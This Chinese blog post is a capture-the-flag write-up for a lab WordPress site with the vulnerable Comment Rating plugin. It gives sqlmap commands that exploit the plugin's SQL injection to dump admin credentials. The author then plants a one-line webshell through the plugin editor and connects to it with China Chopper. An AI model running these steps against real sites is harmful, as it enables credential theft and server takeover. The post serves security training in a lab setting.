墨者靶场 WordPress插件漏洞分析溯源

最新推荐文章于 2024-05-10 11:01:10 发布
最新推荐文章于 2024-05-10 11:01:10 发布
阅读量1.3k 收藏 3
点赞数 3
分类专栏: 渗透测试 文章标签: web安全 渗透测试 wordpress漏洞 comment rating 墨者学院
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40228200/article/details/128440191
版权

今天继续给大家介绍CTF刷题,本文主要内容是墨者靶场 WordPress插件漏洞分析溯源。

免责声明:
本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负!
再次强调:严禁对未授权设备进行渗透测试!

一、题目简介

题目URL为:https://www.mozhe.cn/bug/detail/S0JTL0F4RE1sY2hGdHdwcUJ6aUFCQT09bW96aGUmozhe,页面如下所示:
在这里插入图片描述
启动靶场环境后,打开页面如下所示:
在这里插入图片描述
可以发现,在页面底部有很明显的提示,即本系统采用WordPress架构,如下所示:
在这里插入图片描述

二、解题实战

接下来,我们就针对该靶场进行实战。
结合本题题目,可以知道,本题主要问题在于wordpress,并且极有可能是wordpress的插件漏洞。因此,我们使用wpscan对wordpress插件进行扫描,结果如下所示(关于wpscan工具简介与应用可参考文章:wpscan工具简介与使用):
在这里插入图片描述
我们可以在https://www.exploit-db.com/上搜索wordpress的comment rating插件的漏洞,结果如下所示:
在这里插入图片描述
我们可以点击相关文章,然后就可以发现wordpress插件comment rating插件的漏洞详情,如下所示:
在这里插入图片描述
从上文中可知,在URL:

http://124.70.71.251:45277/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a&imgIndex=1_14_%20HTTP/1.1

中存在SQL注入漏洞。因此,我们可以使用sqlmap对该SQL注入漏洞进行探测,探测语句如下所示:

python ./sqlmap.py -u "http://124.70.71.251:45277/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a&imgIndex=1_14_%20HTTP/1.1" --dbs

该语句执行后结果如下所示:
在这里插入图片描述
从上图可以看出,在当前的数据库中有test和information_schema两个库。接下来,我们来查询test库中的表名,探测命令为:

python ./sqlmap.py -u "http://124.70.71.251:45277/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a&imgIndex=1_14_%20HTTP/1.1" -D test --tables

执行结果如下所示:
在这里插入图片描述
从上图中可以看出,我们已经探测出test库下的所有表名,接下来我们探测wp_users表中的字段,探测语句为:

python ./sqlmap.py -u "http://124.70.71.251:45277/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a&imgIndex=1_14_%20HTTP/1.1" -D test -T wp_users --columns

执行结果如下所示:
在这里插入图片描述
从上图中可以看出,我们已经探测除了该表下的所有字段,接下来,我们需要导出user_login和user_pass字段的数据,探测语句为:

python ./sqlmap.py -u "http://124.70.71.251:45277/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a&imgIndex=1_14_%20HTTP/1.1" -D test -T wp_users -C user_login,user_pass --dump

该命令执行结果如下所示:
在这里插入图片描述
从上文可以看出,探测出的用户名、密码为admin,并且sqlmap自带将密码进行探测的功能,探测出原始密码为12qwaszx。接下来,我们就可以利用探测出的用户名密码登录系统了,如下所示:
在这里插入图片描述
在登录到系统后台后,我们点击“插件”——“Comment Rating”,如下所示:
在这里插入图片描述
然后,我们选择编辑插件,并且在插件的开头插入一句话木马,如下所示:
在这里插入图片描述
点击保存后,该页面就会在以下URL中被加载:

http://124.70.71.251:45277/wp-admin/plugin-editor.php?file=comment-rating/comment-rating.php

我们尝试使用菜刀链接,如下所示:
在这里插入图片描述
发现建立连接成功!
在这里插入图片描述
我们就可以在菜刀连接中找到对应的flag了,如下所示:
在这里插入图片描述
这样,我们就完成题目要求了!
原创不易,转载请说明出处:https://blog.csdn.net/weixin_40228200

永远是少年啊
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
墨者安全专家 3.7(更新)
11-03
1、墨者革离术 运用了墨者研发的新技术,结合权限管理的功能,有效防止防火墙和杀毒软件尚未识别的安全危险入侵,并在病毒库反应前把系统与安全隐患完全隔离,有效防止木马盗号等。 2、墨者查杀病毒 兼容主流杀毒软件,并可永久免费使用全球杀毒知名企业趋势科技的杀毒专家,将病毒一网打尽。 3、墨者漏洞修补 通过全面扫描windows和软件中存在的系统漏洞,一键完成补丁的下载与安装,及时排除系统的安全隐患。 4、墨者保护隐私 及时清理上网历史记录、网银注册信息、系统临时文件及cookies等,全面保护个人隐私,防范由此带来的安全威胁。 5、墨者防火墙 快速评估系统的网络防护状态,通过配置病毒防火墙,控制非法网络访问,帮助用户有效抵御黑客攻击等安全风险。 6、墨者安防问答 在线提出您的系统安全问题,不仅有专家及时解答,更有24小时网友互助,让墨者的互动式咨询服务一步到位。 如您的电脑未安装杀毒软件,为彻底清除其中已存的病毒,推荐下载墨者安全专家豪华版,内含终身免费升级的趋势杀毒软件。 墨者安全专家 3.28 版更新信息1、兼容迅雷看看桌面版、迅雷6、五笔加加 2、完善革离术兼容性 3、完善自动更新的功能
墨者安全专家第二代 彻底免疫未知病毒
11-02
【基本介绍】 墨者安全专家第二代为您彻底免疫未知病毒,并且提供终身免费国际杀毒品牌趋势科技的优质产品! 墨者安全专家第二代是融合了反rootkit技术、用户权限管理技术和白名单技术并有机集成的免疫“革离”技术。同时第二代集终身趋势免费杀毒、修复系统漏洞、上网痕迹清理、网络防火墙、系统实时保护、安全互助社区等强大功能于一身。特别是第二代的“革离术”,在第一代基础上能让用户简单利用权限管理等功能,并且有效阻止防火墙和杀毒软件尚未识别的安全危险,从源头上杜绝未知病毒的侵入,在杀毒软件还未响应前对电脑进行免疫处理,从而提高了系统的安全门槛,真正为每一位用户提供全方位的系统安全防护。 【软件功能】 1、墨者革离术第二代 运用了墨者研发的新型免疫防护技术,结合权限管理的功能,有效防止防火墙和杀毒软件尚未识别的安全危险(病毒和木马)入侵,并在病毒库反映前把系统与安全隐患完全隔离,有效防止木马盗号等。 2、墨者查杀病毒 兼容主流杀毒软件,并可永久免费使用并升级全球杀毒知名企业趋势科技的杀毒产品,将病毒一网打尽。 3、墨者漏洞修补 通过全面扫描windows和软件中存在的系统漏洞,一键完成补丁的下载与安装,及时排除系统的安全隐患。 4、墨者保护隐私 及时清理上网历史记录、网银注册信息、系统临时文件及cookies等,全面保护个人隐私,防范由此带来的安全威胁。 5、墨者防火墙 快速评估系统的网络防护状态,通过配置病毒防火墙,控制非法网络访问,帮助用户有效抵御黑客攻击等安全风险。 6、墨者安防问答 在线提出您的系统安全问题,不仅有专家及时解答,更有24小时网友互助,让墨者的互动式咨询服务一步到位。
墨者安全专家 v3.7.2.9
03-12
软件介绍 墨者安全专家第二代为您彻底免疫未知病毒,并且提供终身免费国际杀毒品牌趋势科技的优质产品! 墨者安全专家第二代是融合了反rootkit技术、用户权限管理技术和白名单技术并有机集成的免疫"革离"技术。同时第二代集终身 趋势免费杀毒、修复系统漏洞、上网痕迹清理、网络防火墙、系统实时保护、安全互助社区等强大功能于一身。特别是第二代的"革 离术",在第一代基础上能让用户简单利用权限管理等功能,并且有效阻止防火墙和杀毒软件尚未识别的安全危险,从源头上杜绝未 知病毒的侵入,在杀毒软件还未响应前对电脑进行免疫处理,从而提高了系统的安全门槛,真正为每一位用户提供全方位的系统安全 防护。 墨者安全专家第二代拥有六项功能: 1、墨者革离术第二代 运用了墨者研发的新型免疫防护技术,结合权限管理的功能,有效防止防火墙和杀毒软件尚未识别的安全危险(病毒和木马)入侵, 并在病毒库反映前把系统与安全隐患完全隔离,有效防止木马盗号等。 2、墨者查杀病毒 兼容主流杀毒软件,并可永久免费使用并升级全球杀毒知名企业趋势科技的杀毒产品,将病毒一网打尽。 3、墨者漏洞修补 通过全面扫描windows和软件中存在的系统漏洞,一键完成补丁的下载与安装,及时排除系统的安全隐患。 4、墨者保护隐私 及时清理上网历史记录、网银注册信息、系统临时文件及cookies等,全面保护个人隐私,防范由此带来的安全威胁。 5、墨者防火墙 快速评估系统的网络防护状态,通过配置病毒防火墙,控制非法网络访问,帮助用户有效抵御黑客攻击等安全风险。 6、墨者安防问答 在线提出您的系统安全问题,不仅有专家及时解答,更有24小时网友互助,让墨者的互动式咨询服务一步到位。
Wordpress漏洞复现
weixin_52194536的博客
09-10 8510
cms漏洞
漏洞导致 60 万个 WordPress 网站遭受攻击
网络研究观
11-16 2331
建议所有使用该件的用户尽快升级到最新版本。
wordpress4.9漏洞
小小猪的博客
12-01 8000
漏洞介绍: WordPress可以说是当今最受欢迎的(我想说没有之一)基于PHP的开源CMS,其目前的全球用户高达数百万,并拥有超过4600万次的超高下载量。它是一个开源的系统,其次它的功能也十分强大。也正因为此,WordPress也成了众多黑客的攻击目标,一旦得手也就意味着数百万用户的沦陷。这种广泛的采用使其成为网络犯罪分子的一个有趣目标。这次实验的漏洞是在WordPress核心中的一个经过身份验证的任意文件删除漏洞CVE-2018-20714 该漏洞可能导致攻击者执行任意代码。该漏洞自发现到报告给W
如何挖掘Wordpress网站的漏洞
fly_enum的博客
06-10 1062
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。如果您访问https://target.com并查看源代码,您将看到来自 WordPress 的主题和件的链接。攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去接私活完全没有问题。
Wordpress 漏洞利用与后渗透
Y525698136的博客
01-11 1308
渗透这类 CMS 网站时,不要上来就狂扫,它大部分目录都是固定的,开源去看对应版本,商业的找几篇文章。特别 注意的是一定先去找对应版本漏洞,不要自己手工测基本行不通的。
WordPress安全指南:19个步骤让您的WordPress安全防线坚如磐石
hu5566798的博客
01-17 3032
无论您的密码有多安全,都存在被他人发现的风险。使用巧妙的密码、保持核心和件更新,以及选择安全的托管WordPress主机,这些只是让您的WordPress网站保持正常运行和安全运行的一小部分。对于你们中的许多人来说,您的WordPress网站既是您的业务,也是您的收入,因此花一些时间并尽快实施上述一些安全最佳实践非常重要。不过,您可以使用推荐的WordPress托管服务提供商和最新的服务器并定期更新您的WordPress安装、主题和件,从而轻松防止Pharma Hacks。但是,您的登录信息有多重要?
CMS知识小结及wordpress的安装与漏洞复现
人若有志,就不会在半坡停止。
09-11 2590
CMS是Content Management System的缩写,意为"内容管理系统",是一种帮助用户创建、管理和修改网站内容而无需专业技术知识的软件。内容管理系统是一种位于WEB 前端(Web服务器)和后端办公系统或流程(内容创作、编辑)之间的软件系统。内容的创作人员、编辑人员、发布人员使用内容管理系统来提交、修改、审批、发布内容。这里指的“内容”可能包括文件、表格、图片、数据库中的数据甚至视频等一切你想要发布到Internet、Intranet以及Extranet(外网)网站的信息。
WebShell文件上传漏洞分析溯源
02-22
WebShell文件上传漏洞
spring IOC实现(墨者革离)
12-12
该代码主要用于spring IOC的实现(墨者革离),模拟一个城门叩问的编剧场景
墨者未必黑.pdf
12-26
墨者未必黑.pdf
CVE-2022-20261 Wordpress件SQL注入漏洞分析及修补
鸣蜩十四的博客
03-11 7304
简介 wordpress是世界上使用最多的开源 CMS 之一。在允许开发者自己构建件和主题来管理网站时,使用我们的许多便捷功能,wordpress的核心会提供件/主题调用和使用wordpress函数的功能,如数据格式、查询数据库等许多选项在提供的众多类中,WP提供的查询DB的类中有SQL Injection错误:WP_Query。WP_Query 是 WordPress 提供的一个用于处理复杂 SQL 查询的类,在 WordPress 核心框架和件中使用范围非常广泛,用户可以通过 WP_Query 类
漏洞分析WordPress REST API 内容注入漏洞分析
Anprou的博客
02-08 4001
WordPress更新到最新版本。
wordpress漏洞_Wordpress File-manager 任意文件上传漏洞复现
weixin_39960793的博客
12-12 1879
一、漏洞介绍软件及漏洞简介:wordpress File Manager件 是最强悍和便利的WordPress文件管理件,可以直接在WordPress后台管理你网站的所有文件,可以完全替代FTP,甚至功能要比FTP还要丰富,可以在线上传、下载、压缩、解压、查看、编辑文件等。WordPress件WPFileManager中存在一个严重的0day安全漏洞,攻击者可以在安装了此件的任何WordP...
(CVE-2022-21661)WordPress SQL 注入漏洞分析和复现
weixin_50464560的博客
09-07 4667
转载https://www.freebuf.com/articles/web/321297.html。
黑客利用WordPress 件中的提权0day攻陷网站
smellycat000的专栏
07-03 677
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士黑客利用 “Ultimate Member” WordPress 件中的 0day 漏洞 (CVE-2023-3460),通过绕过安全措施和注册恶意管理员账户,攻陷网站。Ultimate Member 是一款用户资料和会员件,便于在WordPress 网站上进行注册和构建社区,目前的活跃下载量超过20万次。CVE-2023-3460的CVSS...
web安全之登录框渗透骚姿势,新思路
最新发布
qq_47289634的博客
05-10 610
越权漏洞的挖掘大部分是通过对比两个用户的请求包以及响应包,来观察不同之处,有的时候替换一下响应包就直接越权,其中特别要关注的是uid,这里在挖掘逻辑漏洞和越权漏洞时建议使用burp中的compare模块进行两个数据包的比对,非常直观。width=500&height=100导致可以随意更改大小,配合脚本批量请求,很容易就会把带宽占满,造成dos攻击。不管漏洞挖掘还是挖SRC,登录框都是重点关注对象,什么漏洞都有可能出现,登录框也是框,见框就就对了,说不定会有奇效。看到登录框,输入信息后,抓包。
墨者靶场sql布尔盲注
10-09
针对墨者靶场的 SQL 布尔盲注,你需要先了解 SQL 注入的基本概念和实现方式。在进行布尔盲注时,需要通过构造特定的 SQL 语句来判断数据库中是否存在某些数据或条件,从而实现注入攻击。以下是一些可能用到的注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

永远是少年啊

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值